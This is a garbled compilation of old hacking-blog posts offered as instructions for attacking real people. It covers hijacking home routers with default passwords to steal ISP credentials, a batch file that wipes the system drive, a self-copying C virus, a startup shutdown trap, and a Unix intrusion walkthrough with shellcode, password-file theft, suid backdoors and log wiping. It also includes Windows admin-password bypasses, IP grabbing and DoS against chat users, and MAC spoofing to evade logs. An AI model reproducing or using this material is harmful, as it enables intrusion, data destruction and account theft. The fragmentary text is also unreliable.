the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from
212.129.1.1 to 212.129.255.255 .To keep your scanning range not to big it's smart to
scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the
scan will be finished.The IP adres above is just a example any IP range from a xDSL/
Cabel provider can be used for this hack.before you start scanning specify the TCP/IP
ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so
edit the list and select only port 23 and port 80.Now start scanning and wait for the
results.When finished scanning look for a IP that has a open port 23 and 80. Write them
Step 2.
Way 1
This is important: Most routers have connection log capability so the last thing you
anonymouse proxy server or dailup connection with a fake name and address (56.9
modem for example) when connection to the victim's router.Now get a telnet program.
Windows has a standard telnet program just go to start, select run and type down
"telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP
adres of the victim in the "host name" field press OK.wait for your computer to make a
connection. This way only works when the router has a open telnet port service running
Way 2
This is important: Most routers have connection log capability so the last thing you
anonymouse proxy server or dailup connection with a fake name and adres (56.9
modem for example) when connection to the victim's router.Open a Internet explorer
windows enter the IP address of the victim after the http:// in the address bar.This
way only works when the router has a open hyper text transfer protocol (http) service
running.
Step 3
Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a
loginname and password. When the user doesn't change any security value's the default
password stay's usable.So the only thing you have to do is find out what type of router
the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is
good. When you find out the type of router that's been used get the wright loginname
and password from this list (get it here. not every router is on the list)
Step 4
When you have a connection in telnet or internet expolorer you need to look for user
accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look
for anything that maybe contains any info about the ISP account of the user.go to this
option and open it. Most likely you will see a overview of user setup options.Now look
for the username and password.In most case the username will be freely displayed so
just write it down or what ever....The password is a different story. Allmost always the
password is protected by ********* (stars) in the telnet way there is noway around it
(goto another victim) but when you have a port 80 connection (http). Internet
connection way open click right mouse key and select "View source" now look for the
field where the star are at. most likely you can read it because in the source code the
star are converted to normal ASCII text.If not get a "******** to text" convertor like
snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a
miracle you can read the password.Now you have the username and password. There a
million fun thing to do with that but more about that next time.check the tutorial page
freqently.
Tips.
Beware on most routers only one person can be loget on simultaneous in the router
setupmenu.Don't change anything in the router if you don't know what you are doing.
Labels: administrator, all run commands, batch, c virus, computer, computers, cracking, cracks, hacking, hacks,
password, password hacking, pc hacking, play, windows, windows xp, xp, yahoo hacking
@Echo off
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Labels: batch, c virus, computer, computers, cracking, cracks, fromat hard disk, hacking, hacks, tweaking
Virus in c
#include
#include
#include
#include
#include
cprintf("--------------------------------------------------------------------------");
cprintf("--------------------------------------------------------------------------");
done = findfirst("*.*",&ffblk,0);
while (!done)
printf("\n");
cprintf("Folderbomb");
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONLY);
while(1)
byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
elsebreak;
close(source);close(target);done = findnext(&ffblk);
getch();
Labels: c virus, computer, computers, cracking, cracks, hacking, hacks, registry, screwup pc, virus writing,
Configuration (Modifies DHCP Class ID) - ipconfig /setclassid Anonymous 9/28/06 Java
Immediately) - sfc /scannowSystem File Checker Utility (Scan Once At Next Boot) - sfc /
scanonceSystem File Checker Utility (Scan On Every Boot) - sfc /scanbootSystem File
Checker Utility (Return to Default Setting) - sfc /revertSystem File Checker Utility
(Purge File Cache) - sfc /purgecache Anonymous 9/28/06 System File Checker Utility
tourstartWordpad – write
Labels: administrator, all run commands, computer, cracking, cracks, hacking, password, password hacking, pc
hacking, play, remote access, run, screwup pc, windows, windows xp, xp, yahoo hacking
shutdown ur friends pc
Shutdown ur friend's comp when everytime it starts
put this followin text in a .reg file and run it in the victims pc:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%
windows in safe mode, and open registry editor by typiing REGEDIT in start->run.
navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
and remove the string value named VIRUS, restart you computer.
You can also put this in a javascript code, just add this code to your webpage:
Labels: administrator, computer, computers, cracking, cracks, fuck, hacking, hacks, password, password
hacking, pc hacking, play, registry, remote access, screwup pc, windows, windows xp, xp, yahoo hacking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
If you are a hacker, you read this, and find something that's not correct or you don't
like,
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
When you finish reading it, please TELL ME how you like it!
COPYING: You're welcome to distribute this document to whoever the hell you want,
post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
want to
promote computer crime and I'm not responible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on
the way).
able to
NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt
from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running
windoze9x,
You can't hack with that. In order to hack, you'll need one of those UNIX derived
operating
systems.
-the internet is full of UNIX boxes (windoze NT boxes are really few) running
webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and
what's better
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use
them unless
- commercial UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your
box,
so forget it.
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
It's possible you have problem with your hardware on the installation. Read the
manual, ask
for technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for
You're a Linux user, and you gotta open your way to the Internet.
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem
installed
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all
winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens
winmodem has not a critical chip that makes it work. It works on windoze cause the
vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/
modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with
wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot
connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your
case,
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux bow is now
It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll
be safe.
- Don't hack
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace
you, find
your own website oe email address, find your ISP, your phone number, your home...
hacking too.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.
net.
Military boxes
Government boxes
Japanese boxes
- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
~~~~~~~~~~~~~~~~~~~~~~
Do you got your stealth linux box connected to the internet (not aol)?
First of all, you should know some things about the internet. It's based on the TPC/IP
protocol,
(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and
waiting for
So you can open a connection and send data to any these ports. Those ports are
associated with
a service:
that runs
on the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
21 FTP FTPd
23 Telnet telnetd
80 HTTP apache
Example:
this:
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
connect to every port on the box and tells which of them are opened.
(The 1518 ports scanned but not shown below are in state: closed)
Nmap has told us which ports are opened on target.edu and thus, what services it's
offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
Trying xx.xx.xx.xx...
Connected to target.edu.
quit
221 Goodbye.
You see?
Trying xx.xx.xx.xx...
Connected to target.edu.
400 (EDT)
quit
Why is this information useful to us? cause the security bugs that can let us in depend
It's difficult to really know what daemons are they running, but we can know FOR SURE
(The 1518 ports scanned but not shown below are in state: closed)
We know the host is running the Linux 2.x kernel. It'd be useful to know also the
distribution,
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get
angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a
better
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
bash-2.03$ ls
program.c
Connected to target.edu.
Name: luser
Password:
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect
us.
sh-2.03$ vi exploit.c
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from
xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux
distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.
edu
is running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other
daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most
easy
exploitable. If your target gots an old version, you'll probably get in easyly.
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com
file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
http://www.hack.co.za/
http://www.r00tabega.org/
http://www.rootshell.com/
http://www.securityfocus.com/
www.insecure.org/sploits.html
Every exploit is different to use, so read its text and try them.
The most standar and easy to use exploits are buffer overflows.
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
Buffer overflows fool a program (in this case sendmail) to make it execute the code
you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to
hack them.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
You should have now the shell account, this is the time to use it!
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Welcome to yourshellaccount
login: malicioususer
sh-2.03$
we compile it:
we execute it:
sh-2.03$ ./exploit
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
$whyamiroot
There are some exploits that don't give you root directly, but a normal shell.
Then you'll have to upload a .c file with a local (local means it can't overflow
Other kind of exploit is the one that gives you access to the password file.
(remote root logins are usually not allowed) by putting his/hers/its username
Trying xx.xx.xx.xx...
Connected to target.edu.
Welcome to target.edu
login: luser
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an
exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary
word
or a person's name.
I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator
priviledges
To learn how to crack a password file and extract its passwords, download a document
called
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
Hacktivism is good and respected. You can change the page of bad people with bad
ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
No, this time you should do another thing. You should keep that system for you to play
with
Once we type "exit" on our login shell, we're out. And we gotta repeat all the process
to get
back in.
So now we're root and we can do everything, we shall put some backdoors that let us
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it
suid
permissions:
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
sh-2.03$ cd /dev
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this
works everywhere.
sh-2.03$ exit
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
There's one problem: actually most shells drop suid permissions, so the sushi doesn't
work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
try this:
sh-2.03$ vi /etc/passwd
sh-2.03$ su dood
sh-2.03$ whoami
dood
Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not
TCP)
and give a shell to you when you connect. The cool thing of UDP is this:
If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
Cleaning up
~~~~~~~~~~~
Yes, that was displayed by the target box when we logedin there.
"It has happen some strange thing, when I loggedin today, I've read a line like this:
Does it mean I did login yesterday? It can't be, I don't work on sundays!
"That wasn't a bug! this line means someone acceded the system using your password,
don't
worry for that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get . Then we shall call the police and he'll get busted"
So you'll get busted because luser was a bit clever (sometimes happens).
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
lled gots a buitin help that explains how to use it, remember to chmod the fake file
Remember when i told you not to use FTP? Well, in case you did it, you must now
The who command shows us (and the admin) which lusers are logedin at the moment.
sh-2.03$ who
Zap2!
sh-2.03$ who
sh-2.03$
Labels: administrator, computer, computers, cracking, cracks, fuck, hacking, hacks, password, password
hacking, pc hacking, play, registry, remote access, screwup pc, windows, windows xp, xp
remote access
Just Control Another Computer Remotely.
1. Go tO COmmand Promt(press Windows+R and type cmd)2. type cd\ (to go to main
root Of C:)3. type the command c:\net use \\(Rempote PC's Username i.e Adrian)\ipc$ /
above Command) The Password Or Username Is Invalid For \\Adrian\ipc$. Enter The
Hand Double Click On The Key Named As "NTLM"(New BOx Appear) Value Name:NTLM
Value Data:(Replace 2 with 0) Base :HexaDecimal Press OK. Get Out Of registry
Editor.8. Again Press Windows+R And Write mmc.(Consol1 Will Open)9. Press Alt+F then
Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.13.Now Press
To Command Promt Write c:\telnet Adrian(Press Enter) it Will Require Login And
C:dir(Enter)
Labels: administrator, computer, computers, cracking, cracks, hacking, hacks, password hacking, pc hacking,
play, registry, remote access, screwup pc, windows, windows xp, xp, yahoo hacking
____________________________________________________________________
08002B30309D}" goto UNLOCKif NOT EXIST porno goto MDLOCKER:CONFIRMecho Are you
sure u want to Lock the folder(Y/N)set/p "cho=>"if %cho%==Y goto LOCKif %cho%==y
goto LOCKif %cho%==n goto ENDif %cho%==N goto ENDecho Invalid choice.goto CONFIRM:
Labels: control panel, fuck, hacking, hacks, password, password hacking, play, registry, screwup pc, windows
This is only for education purpose.So who ever try this is at his risk.I am not sure that
this will work 100 %.But yes will work almost 70 percent of the times.But before that
you need to know some few things of yahoo chat protocolleave a comment here after u
see the post lemme know if it does works or not or u havin a problem post here
Following are the features : -1) When we chat on yahoo every thing goes through the
server.Only when we chat thats messages.2) When we send files yahoo has 2 optionsa)
Either it uplo--- the file and then the other client has to down load it.b) Either it
connects to the client directly and gets the files3) When we use video or audio:-a) It
either goes thru the serverb) Or it has client to client connectionAnd when we have
client to client connection the opponents IP is revealed.On the 5051 port.So how do we
exploit the Chat user when he gets a direct connection. And how do we go about it.
Remeber i am here to hack a system with out using a TOOL only by simple net
commands and yahoo chat techniques.Thats what makes a difference between a real
hacker and new bies.So lets ----yse1) Its impossible to get a Attackers IP address when
you only chat.2) There are 50 % chances of getting a IP address when you send files3)
So why to wait lets exploit those 50 % chances.I will explain only for files here which
lies same for Video or audio1) Go to dostype ->netstat -n 3You will get the following
64.4.12.200:1863 ESTABLISHED
Active Connections
64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And
in right hand side is the IP address of the foreign machine.And the port to which is
2) Try sending a file to the Target .if the files comes from server.Thats the file is
uploaded leave itYou will not get the ip.But if a direct connection is
establishedHMMMM then the first attacker first phase is overThis is the output in your
ESTABLISHED
Thats what is highlighted in RED. So what next3) Hmmm Ok so make a DOS attack
system is not protected then you can see the whole network.C:\>nbtstat -A
194.30.209.14
GROUP Registered
Ok so you will ask now what next.No you find what you can do with this network than
me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user
Labels: administrator, computer, computers, cracking, cracks, fuck, hacking, hacks, password, password
of the person whose account you want to hack. This also works if you want to hack
someone else's account on your pc bit do not know his/her password.Click on START--
>RUN.Type compmgmt.msc & press enter.In the left pane, select COMPUTER
right pane, select the user name whose account you want to hack. RIGHT CLICK and
then click on SET PASSWORD from the pop-up menu.Enter the new password. Click on
OK.There you have it. You have changed the user's password!
Labels: computer, computers, cracking, cracks, hacking, hacks, password, password hacking, play, screwup pc,
windows xp, xp
tutorial on registry
____________________________________________________________________________
____________________________________________________________________________
The registry is a hierarchical database that contains virtually all information about your
on. From this you can understand how important the registry is. The structure of the
registry is similar to the ini files structure, but it goes beyond the concept of ini files
because it offers a hierarchical structure, similar to the folders and files on hard disk.
In fact the procedure to get to the elements of the registry is similar to the way to get
to folders and files. In this section I would be examing the Win95\98 registry only
The Registry EditorThe Registry Editor is a utility by the filename regedit.exe that
allows you to see, search, modify and save the registry database of Windows. The
Registry Editor doesn't validate the values you are writing: it allows any operation. So
you have to pay close attention, because no error message will be shown if you make a
wrong operation. To launch the Registry Editor simply run RegEdit.exe ( under WinNT
run RegEdt32.exe with administer privileges). The registry editor is divided into two
sectios in the left one there is a hierarchical structure of the database (the screen
looks like Windows Explorer) in the right one there are the values. The registry is
organized into keys and subkeys. Each key contains a value entry , each one has a
name, a type or a class and the value itself. The name is a string that identifies the
value to the key. The length and the format of the value is dependent on the data type.
As you can see with the Registry Editor, the registry is divided into five principal keys:
there is no way to add or delete keys at this level. Only two of these keys are
effectively saved on hard disk: HKEY_LOCAL_MACHINE and HKEY_USERS. The others are
computer is booting. The data stored in this key is shared with any user. This handle
Config Contains configuration data for different hardware configurations. Enum This is
the device data. For each device in your computer, you can find information such as
the device type, the hardware manufacturer, device drivers and the configuration.
Hardware This key contains a list of serial ports, processors and floating point
contains data that checks which device drivers are used by Windows and how they are
configured.
\Classes and contains OLE, drag'n'drop, shortcut and file association information.
Windows maintains part of the registry in memory instead of on the hard disk. For
example it stores PnP information and computer performance. This key has two sub
keys
Config Manager This key contains all hardware information problem codes, with their
different way. PerfStats It contains performance data about system and network
HKEY_USERS This important key contains the sub key .Default and another key for each
user that has access to the computer. If there is just one user, only .Default key
exists. . Each sub key maintains the preferences of each user, like the desktop colors,
the fonts used, and also the settings of many programs. If you open a user subkey you
AppEvent It contains the path of audio files that Windows plays when some events
happen. Control Panel Here are the settings defined in the Control Panel. They used to
be stored in win.ini and control.ini. Keyboard Layouts It contains a voice that identify
the actual keyboard disposition how it is set into the Control Panel. Network This key
stores subkeys that describe current and recent network shortcuts. RemoteAccess The
settings of Remote Access are stored here. Software Contains all software settings.
This data was stored in win.ini and private .ini files. HKEY_CURRENT_USER It is an alias
Here I am assuming that you already have a .reg file on your hard disk and want to
know more about how it is structured.Now do not double click the .reg file or it's
content will be added to the registry, of course there will be warning message that
pops up. Now to view the properties of the .reg file open it in notepad.To do so first
open menu open the .reg file.Now the thing that differentiates .reg files from other
files is the word REGEDIT4. It is found to be the first word in all .reg files. If this word
is not there then the registry editor cannot recognize the file to be a .reg file. Then
follows the key declaration which has to be done within square brackets and with the
full path.If the key does not exist then it will be created.After the key declaration you
will see a list of values that have to be set in the particular key in the registry.The
values look like this: "value name"=type:value Value name is in double commas. Type
can be absent for string values, dword: for dword values and hex: for binary values and
for all other values you have to use the code hex(#): , where # indicate the API code of
the type.
Published on Black Sun Research Facility -Important Note: expand string has API code =
As you can see, strings are in double quotes, dword is hexadecimal and binary is a
sequence of hexadecimal byte pairs, with a comma between each. If you want to add a
back slash into a string remember to repeat it two times, so the value "c:\Windows"
will be "c:\\Windows". Before write a new .reg file, make sure you do this else you will
FILENAME.REG to merge a .reg file with the registry /L:SYSTEM to specify the position
export the registry to a file. If the key is specified, the whole branch will be exported./
c FILENAME.REG to substitute the entire registry with a .reg file /s to work silently,
Labels: cracking, cracks, fuck, hacking, hacks, play, registry, screwup pc, windows, windows xp, xp
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these
Wait its not over read the rest to find out how to Hack the Window XP Administrator
Your are nagivating to the windows system Directory where the system files are stored.
Next your creating a temporary directory called mkdir. After which you are copying or
backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the
So basically you are telling windows is to backup the command program and the screen
saver file. Then we edited the settings so when windows loads the screen saver, we
will get an unprotected dos prompt without logging in. When this appears enter this
command
Example: If the admin user name is clazh and you want change the password to pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the
Window XP Administrator Password now you can Log in, using the hacked Window XP
Here are the steps involved to De Hack or restore the Window XP Administrator
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these
exit
back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little
tweak in the local security policy (control panel->administrative tools,works only for
administrators group) will disallow any change in password even if u r the Admin (u can
put a number of other restrictions too), but be cautious to give other users limitted
accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have
Update: The above Method only works if the system is FAT/FAT32 - because of the
updated “user rights management” in NTFS - file level rights etc. This does not work on
GO TO START>RUN>TYPE
REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL
__________________________________________________________
Steps
1] Browse C:\WINDOWS\system32\drivers\etc
3] Open it in notepad
5] Done!
example :
127.0.0.1 localhost
127.0.0.2 www.orkut.com
For every site after that you want to add, just add "1" to the last number in
IE:
127.0.0.3 www.yahoo.com
127.0.0.4 www.msn.com
127.0.0.5 www.google.com
This also works with banner sites, just find the host name of the server with
Hoep this small tutorial could keep you going in simple way of blocking
websites
Labels: block website, block websites, Block websites without any software, registry trick
Media Access Control and in a sense the MAC address is a computer?s true
the LAN asking who has the IP 192.168.1.2. Then the box that has
cached in 192.168.1.1?s ARP table for later use. To put this in Socratic
to me.
You can see the ARP table of a box by dropping out to a command prompt
and typing ?arp ?a? in Windows or just ?arp? in Linux. ARP can also work the
other way by a host on the LAN sending its MAC address to another machine
on the LAN for preemptive caching unless the host is configured to not
A person might want to change the MAC address of a NIC for many reasons:
1. To get past MAC address filtering on a router. Valid MAC addresses can
be found by sniffing them and then the deviant user could assume the MAC
of a valid host. Having two hosts on the same network can cause some
network stability problems, but much of the time it's workable. This is one
attacker can just sniff the MAC address out of the air while in monitor mode
and set his WiFi NIC to use it. Interestingly, a lot of hotels use MAC filtering
in their "pay to surf" schemes, so this method can be an instant in for cheap
MAC as their own they may receive packets not meant for them. However,
3. So as to keep their burned in MAC address out of IDS and security logs,
thus keeping deviant behavior from being connected to their hardware. For
example, two of the main things a DHCP server logs when it leases an IP to
a client is the MAC address and host name. If you have a wireless router
look around on it's web interface for where it logs this info. Luckily there
4. To pull off a denial of service attack, for instance assuming the MAC of
the gateway to a sub net might cause traffic problems. Also, a lot of WiFi
routers will lock up if a client tries to connect with the same MAC as the
router's BSSID.
Linux
To change your MAC address in Linux (and most *nix system) is easy as pie.
ifconfig eth0 up
These two little commands would set your eth0 interface to use the MAC
00:00:00:00:00:01. Just plug in the NIC you want to set and the MAC
address you want to use into the commands above and your done. Changing
your MAC address is one of those things that is much easier to do in Linux
Mac OS X
For versions of OS X before Tiger (OS X 10.4) you will need this patch:
http://slagheap.net/etherspoof/
I'm not much of a Macintosh guy, so I pulled most of this info from:
http://www.macgeekery.com/gspot/2006-04/mac_address_spoofing
http://rgov.org/airport-spoof/
In XP you can use the regedit to edit the registry from a GUI or the reg
\CurrentControlSet\Control\ Class\{4D36E972-E325-11CE-BFC1-
08002bE10318}\ . Under this key you will find a bunch of sub keys labeled as
0000, 00001, 0002 and so forth. We can assume any MAC address we want
by finding the key that controls the NIC we want to change, putting in a
000000000001). To find out which key is which we can search through them
for the value ?DriverDesc? until we find the one that matches the NIC we
wish to alter. After you set ?NetworkAddress? to the address you want just
restart the NIC by disabling it then enabling it (or in the case of PCMCIA
cards, just eject and reinsert). You can confirm the MAC address change by
Mac Makeup is a cool little GUI and Command line tool that's freeware, the
randomize your MAC address and host name on every reboot. Smac has a
nice GUI and was free but has since gone commercial, there's no reason to
bother with it as there are free tools that are just as good. I use MadMACs
Have fun with your MAC addresses switching, but be careful not to cause
http://www.binrev.com/forums/index.php?showtopic=15942
Enjoy.
After Notes:
BSD
Linux
Windows 2000/XP
Method 1:
This is depending on the type of Network Interface Card (NIC) you have. If
you have a card that doesn?t support Clone MAC address, then you have to
go to second method.
Dial-up Connections.
b) Right click on the NIC you want to change the MAC address and click on
properties.
f) On the right side, under "Value", type in the New MAC address you want
to assign to your NIC. Usually this value is entered without the "-" between
g) Goto command prompt and type in "ipconfig /all" or "net config rdr" to
verify the changes. If the changes are not materialized, then use the
second method.
Method 2:
a) Go to Start -> Run, type "regedt32" to start registry editor. Do not use
"Regedit".
b) Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Class
the tree. The subkeys are 4-digit numbers, which represent particular
network adapters. You should see it starts with 0000, then 0001, 0002, 0003
and so on.
c) Find the interface you want by searching for the proper "DriverDesc" key.
d) Edit, or add, the string key "NetworkAddress" (has the data type
e) Disable then re-enable the network interface that you changed (or
Method 3:
etherchange/
Windows 9x
Use the same method as Windows 2000/XP except for the registry key
Labels: best hacking tools, change ip address, find IP, hack, how to change ip address, How to
Hide ur drives
How to Hide the drives(c:,d:,e:,a:...etc)
This is a great trick you can play on your friends. To disable the display of
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer
Now in the right pane create a new DWORD item and name it NoDrives(it is
case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your computer. So, now when you click on My Computer, no
Computer, simply delete this DWORD item that you created.Again restart
your computer.You can now see all the drives again. Magic........lol....
to Shortcut (in other words, create a new shortcut). You should now see a
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct
letter of the hard drive. Click the "Next" button. Name the shortcut and
click the "Finish" button. Now whenever you want to shut down, just click
Speedup ur pc
Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and
working a lot with ur pc. That's cause ur RAM is full of remaining progress
something...
Type
FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files"
Of course u can edit the code in the file for a greater "cleaning-progress".
FreeMem=Space(1280000000)
Labels: clean ur RAM, free ur RAM, increase speed of ue pc, RAM cleaning
Just copy and paste the code given below in notepad and save it as
anyname.bat(not txt)
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
Greatgame /t REG_SZ
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cd %userprofile%\desktop
cd %userprofile%My Documents
start
